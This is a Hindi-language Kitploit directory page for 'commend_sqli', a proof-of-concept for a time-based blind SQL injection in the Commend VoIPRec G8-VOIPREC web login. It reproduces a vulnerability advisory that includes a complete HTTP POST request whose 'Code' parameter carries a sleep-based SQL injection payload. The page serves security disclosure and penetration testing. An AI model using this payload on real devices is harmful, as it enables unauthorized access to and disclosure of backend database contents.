Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
commend_sqli — Commend VoIPRec G8-VOIPREC डिवाइस में टाइम-आधारित ब्लाइंड SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो डेटाबेस हेरफेर के लिए कमजोर Code पैरामीटर को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/jet-pentest/commend_sqli
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubjet-pentest/commend_sqli

commend_sqli

Commend VoIPRec G8-VOIPREC डिवाइस में टाइम-आधारित ब्लाइंड SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो डेटाबेस हेरफेर के लिए कमजोर Code पैरामीटर को लक्षित करता है।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-XXXXX

[सुझाया गया विवरण]

G8-VOIPREC (Commend VoIPRec) वेब इंटरफ़ेस लॉगिन पेज के "Code" पैरामीटर में समय-आधारित ब्लाइंड SQL इंजेक्शन के लिए संवेदनशील है।

[अतिरिक्त जानकारी]

PoC:

POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html

Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'

[भेद्यता प्रकार]

SQL Injection

[उत्पाद का विक्रेता]

Commend International

[प्रभावित उत्पाद कोड बेस]

G8-VOIPREC

[हमले का प्रकार]

दूरस्थ

[प्रभाव सूचना प्रकटीकरण]

true

[हमले के वेक्टर]

दूरस्थ उपयोगकर्ता बैकएंड डेटाबेस में हेरफेर करने के लिए दुर्भावनापूर्ण SQL कोड का उपयोग कर सकता है ताकि वह उस जानकारी तक पहुंच सके जो प्रदर्शित करने के लिए अभिप्रेत नहीं थी।

[खोजकर्ता]

Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)

[संदर्भ]

https://www.commend.com/

टूल डाउनलोड करें